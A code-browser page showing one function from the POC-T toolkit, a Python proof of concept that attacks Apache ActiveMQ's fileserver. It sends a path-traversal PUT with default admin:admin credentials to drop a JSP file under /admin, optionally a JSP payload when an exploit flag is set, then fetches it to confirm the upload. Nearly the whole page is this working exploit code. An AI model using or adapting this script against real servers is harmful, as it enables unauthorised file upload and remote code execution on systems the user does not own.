MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/activemq-upload.py:21–38  ·  view source on GitHub ↗
(base)

Source from the content-addressed store, hash-verified

19
20
21def poc(base):
22 base = "http://" + base if '://' not in base else base
23 name = randomString(5)
24 uri = '{url}/admin/{name}.jsp'.format(url=base.rstrip('/'), name=name)
25 target = r'{url}/fileserver/sex../../..\admin/{name}.jsp'.format(url=base.rstrip('/'), name=name)
26 key = base64.b64encode("admin:admin")
27 headers = {'Authorization': 'Basic %s}' % key, 'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/45.0'}
28 put_data = JSP_UPLOAD if ENABLE_EXP else randomString(10)
29 try:
30 res1 = requests.put(target, headers=headers, data=put_data, timeout=10)
31 res2 = requests.get(uri, headers=headers, timeout=10)
32 if res1.status_code == 204 and res2.status_code == 200:
33 if ENABLE_EXP:
34 return uri
35 return uri if put_data in res2.content else False
36 except Exception:
37 return False
38 return False

Callers

nothing calls this directly

Calls 3

randomStringFunction · 0.90
formatMethod · 0.80
getMethod · 0.80

Tested by

no test coverage detected